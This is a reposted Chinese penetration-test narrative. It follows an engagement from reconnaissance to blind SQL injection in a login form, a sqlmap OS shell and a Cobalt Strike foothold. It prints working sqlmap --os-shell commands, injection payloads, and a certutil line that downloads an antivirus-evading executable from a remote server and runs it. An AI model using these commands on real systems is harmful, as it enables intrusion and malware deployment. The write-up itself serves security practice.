实战|记一次从登录框到内网横向

admin 2023年10月31日14:57:31评论105 views字数 1872阅读6分14秒阅读模式
文章转载自公众号:星海安全实验室

前言

接到公司通知要对某某行业做渗透测试,挖一些尽可能高危的漏洞,于是便有了接下来的故事。

0x01 信息收集
首先收集了十几个该行业相关的网站,然后一个个做信息收集,先列出来可利用的点。
实战|记一次从登录框到内网横向


1.某某公司为YouDianCMS(可能存在注入)。
2.某集团OA,使用的是通达OA。
3.管理系统,存在登录框,无验证码。
4.某监控管理系统,存在登录框,无验证码。
5.某收费系统,使用的是若依管理系统。
0x02 漏洞利用
1.通达OA


习惯性先试一下通达OA,通达OA的利用工具比较方便,若存在漏洞可以一键getshell,不过利用失败了。
实战|记一次从登录框到内网横向
实战|记一次从登录框到内网横向
2.测试YouDianCMS
之前收集的youdianCMS的sql注入的POC,直接利用,但是还是不存在该漏洞。
实战|记一次从登录框到内网横向
3.测试若依管理系统
1)测试默认口令:admin/admin123,失败。
实战|记一次从登录框到内网横向
2)测试shiro反序列化漏洞。
实战|记一次从登录框到内网横向
均失败了。
4.测试某管理系统
爆破密码。爆出来了弱口令admin/456123,但是登录进去后找了一圈没有geshell的点,一个弱口令肯定没法交差。
实战|记一次从登录框到内网横向
5.测试某监控管理系统的登录框
实战|记一次从登录框到内网横向
最后一个点了,再不行要重新打点了,本来也没报什么希望,登录框做渗透测试几乎没挖到过什么大的漏洞。
首先测试弱口令,爆破了一圈没有弱口令,扫目录也没扫出什么东西,JS代码里也没泄露有用的信息,突然想到还没试注入,这一试,果然有问题。
实战|记一次从登录框到内网横向
实战|记一次从登录框到内网横向
当参数loginName的值后边修改为and'q'='q"时,页面返回密码错误,修改为and'u'='k"时,页面返回用户不存在,说明页面存在布尔盲注。
sqlmap一把梭:
sqlmap.py -r 1.txt --dbs --random-agent --proxy=http://127.0.0.1:7890
实战|记一次从登录框到内网横向
跑出来了数据库,但是跑表的时候出错了,不知道为什么跑不出来。
直接获取shell试试:
sqlmap.py -r 1.txt --os-shell --random-agent --proxy=http://127.0.0.1:7890

实战|记一次从登录框到内网横向
可以执行命令,但是回显的巨慢。
本来想着已经成功了,接下来的拿shell就水到渠成,没想到又曲折了一番。


1.CS直接生成powershell命令,然后令目标系统执行,执行完毕一直没上线,然后想着让sqlmap回显一下看看有什么问题,等了十几分钟页面才回显完,应该是有杀软,页面返回的是“检测到该命令为危险命令”,就给拦截了。


实战|记一次从登录框到内网横向
2.直接生成exe肯定也不行,这时候就要让大佬帮忙了。
实战|记一次从登录框到内网横向
实战|记一次从登录框到内网横向
免杀马到手,Windows通过certutil命令进行远程下载。先把免杀马上传到VPS上,然后开一个http服务。然后在shell中执行:
certutil -urlcache -split -f http://xx.xx.xx.xx/cs.exe dll.exe
然后直接通过命令运行:
dll.exe
这回想着肯定能成功,结果等了半天还是没反应,一脸懵逼,看了下VPS,有下载记录呀。
实战|记一次从登录框到内网横向
难道被杀了?
想执行一下dir看看目录下有没有该文件,但是目录下有几百个文件,要等全部都回显要等半小时。
最后想了想是不是该目录下没有权限,于是在目标系统的D盘新建一个dll文件夹,然后把免杀马写到这里。
certutil -urlcache -split -f http://xx.xx.xx.xx/cs.exe d:dlldll.exe

实战|记一次从登录框到内网横向
然后执行:
d:dlldll.exe
终于成功上线。
实战|记一次从登录框到内网横向
0x03 横向攻击
看一下目标机器有哪些敏感文件可利用,收获颇丰呀。
实战|记一次从登录框到内网横向
fscan横向一波,发现了几个站点,但是没有扫到能直接利用的漏洞。
实战|记一次从登录框到内网横向
由于领导说的只是让挖到漏洞,所以要问下领导能否进行横向攻击,先点到为止。
0x04 总结
之前做渗透每次遇到登录框都比较头疼,因为登录框可利用的点比较少,也没在登录框上挖到过什么大的漏洞,但是本次运气还是比较好的,总算可以交差了。
如有侵权,请联系删除

推荐阅读

实战|记一次奇妙的文件上传getshell
「 超详细 | 分享 」手把手教你如何进行内网渗透
神兵利器 | siusiu-渗透工具管理套件
一款功能全面的XSS扫描器
实战 | 一次利用哥斯拉马绕过宝塔waf
BurpCrypto: 万能网站密码爆破测试工具
快速筛选真实IP并整理为C段 -- 棱眼
自动探测端口顺便爆破工具t14m4t
渗透工具|无状态子域名爆破工具(1秒扫160万个子域)

查看更多精彩内容,还请关注橘猫学安全:
每日坚持学习与分享,觉得文章对你有帮助可在底部给点个“再看

原文始发于微信公众号(橘猫学安全):实战|记一次从登录框到内网横向

  • 左青龙
  • 微信扫一扫
  • weinxin
  • 右白虎
  • 微信扫一扫
  • weinxin
admin
  • 本文由 发表于 2023年10月31日14:57:31
  • 转载请保留本文链接(CN-SEC中文网:感谢原作者辛苦付出):
                   实战|记一次从登录框到内网横向http://cn-sec.com/archives/2162805.html

发表评论

匿名网友 填写信息